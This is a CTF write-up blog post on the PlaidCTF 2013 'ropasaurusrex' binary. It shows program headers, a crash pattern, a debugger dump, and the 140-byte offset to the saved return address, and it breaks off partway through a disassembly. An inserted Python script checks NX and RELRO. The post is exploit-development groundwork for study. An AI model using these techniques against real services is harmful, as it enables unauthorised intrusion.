codezen.fr code hacking, zen coding

22 Apr 2013

PlaidCTF 2013 – Pwnable 200 – ropasaurusrex Write-up

Posted by aXs

$ file ropasaurusrex
ropasaurusrex: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, stripped

$ eu-readelf -l ropasaurusrex
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000034 0x08048034 0x08048034 0x0000e0 0x0000e0 R E 0x4
INTERP 0x000114 0x08048114 0x08048114 0x000013 0x000013 R 0x1
[Requesting program interpreter: /lib/ld-linux.so.2]
LOAD 0x000000 0x08048000 0x08048000 0x00051c 0x00051c R E 0x1000
LOAD 0x00051c 0x0804951c 0x0804951c 0x00010c 0x000114 RW 0x1000
DYNAMIC 0x000530 0x08049530 0x08049530 0x0000d0 0x0000d0 RW 0x4
NOTE 0x000128 0x08048128 0x08048128 0x000044 0x000044 R 0x4
GNU_STACK 0x000000 0x00000000 0x00000000 0x000000 0x000000 RW 0x4

Section to Segment mapping:
Segment Sections...
00
01 [RO: .interp]
02 [RO: .interp .note.ABI-tag .note.gnu.build-id .hash .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame]
03 .ctors .dtors .jcr .dynamic .got .got.plt .data .bss
04 .dynamic
05 [RO: .note.ABI-tag .note.gnu.build-id]
06

$ nc localhost 1025
hello!
WIN

This binary has a non-executable stack (NX is enabled: the GNU_STACK segment above is flagged RW, not RWE) but has not been compiled with RELRO (read-only GOT): there is no GNU_RELRO segment in the program headers, so the GOT stays writable at runtime.
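As an added example (not part of the original write-up), here is a small Python checker that reads the same program headers eu-readelf printed above and reports NX and RELRO from them. The ELF image it builds for self-testing is constructed from the segment list above and is not the real binary; the constants are the standard ELF values.

```python
import struct
import sys
# Program header types and flag bits from the ELF spec.
PT_LOAD, PT_DYNAMIC, PT_INTERP, PT_NOTE, PT_PHDR = 1, 2, 3, 4, 6
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4

def program_headers(data):
    """Yield (p_type, p_flags) for each program header of a little-endian ELF32 image."""
    if data[:4] != b"\x7fELF" or data[4] != 1 or data[5] != 1:
        raise ValueError("expected a little-endian 32-bit ELF")
    (e_phoff,) = struct.unpack_from("<I", data, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
    for i in range(e_phnum):
        fields = struct.unpack_from("<8I", data, e_phoff + i * e_phentsize)
        yield fields[0], fields[6]  # p_type, p_flags

def check_hardening(data):
    """Report NX and RELRO from the program headers, as the eu-readelf listing shows them."""
    phdrs = list(program_headers(data))
    stack = [f for t, f in phdrs if t == PT_GNU_STACK]
    # NX: a PT_GNU_STACK segment is present and lacks PF_X. Without any PT_GNU_STACK
    # the i386 kernel falls back to an executable stack, so that counts as no NX.
    nx = bool(stack) and not (stack[0] & PF_X)
    # RELRO: the linker emits a PT_GNU_RELRO segment covering the GOT; ropasaurusrex has none.
    relro = any(t == PT_GNU_RELRO for t, _ in phdrs)
    return {"nx": nx, "relro": relro}

def build_elf32(phdrs):
    """Constructed test image: an ELF32 header followed only by the given program headers."""
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8  # ELFCLASS32, little-endian
    ehdr = e_ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0x8048000, 52, 0, 0,
                                 52, 32, len(phdrs), 0, 0, 0)  # e_phoff=52, e_phentsize=32
    body = b"".join(struct.pack("<8I", t, 0, 0, 0, 0, 0, f, 4) for t, f in phdrs)
    return ehdr + body

# Segment types and flags exactly as eu-readelf listed them for ropasaurusrex.
ROPASAURUSREX_PHDRS = [
    (PT_PHDR, PF_R | PF_X), (PT_INTERP, PF_R), (PT_LOAD, PF_R | PF_X),
    (PT_LOAD, PF_R | PF_W), (PT_DYNAMIC, PF_R | PF_W), (PT_NOTE, PF_R),
    (PT_GNU_STACK, PF_R | PF_W),
]
# What linking with -z relro adds: a read-only PT_GNU_RELRO segment over the GOT.
RELRO_PHDRS = ROPASAURUSREX_PHDRS + [(PT_GNU_RELRO, PF_R)]

if __name__ == "__main__":
    for path in sys.argv[1:]:  # e.g. python3 elfcheck.py ./ropasaurusrex
        with open(path, "rb") as f:
            print(path, check_hardening(f.read()))
```

Run it against the constructed images with `check_hardening(build_elf32(ROPASAURUSREX_PHDRS))` to see `{'nx': True, 'relro': False}`, the same verdict the readelf listing gives.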

Crashing it is fairly easy:

$ nc localhost 1025
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4A

Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: 0x00000100 EBX: 0xB77B0FF4 ECX: 0xBFF063D0 EDX: 0x00000100 o d I t s z A P C
ESI: 0x00000000 EDI: 0x00000000 EBP: 0x65413565 ESP: 0xBFF06460 EIP: 0x37654136
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
Error while running hook_stop:
Cannot access memory at address 0x37654136
0x37654136 in ?? ()

$ /opt/metasploit-4.4.0/msf3/tools/pattern_offset.rb 0x37654136
140

It crashes because of a stack overflow: buf is not big enough for the amount of data read() is allowed to read. The offset of 140 matches the layout below: buf sits at ebp-88h (136 bytes) and the saved ebp takes the next 4 bytes, so bytes 140 to 143 of the input land on the saved return address:

.text:080483F4 read_buffer     proc near               ; CODE XREF: handler+9p
.text:080483F4
.text:080483F4 buf             = byte ptr -88h
.text:080483F4
.text:080483F4                 push    ebp
.text:080483F5                 mov     ebp, esp
.text:080483F7                 sub     esp, 98h
.text:080483FD                 mov     dword ptr [esp+8], 100h ; nbytes
.text:08048405                 lea     eax, [ebp+buf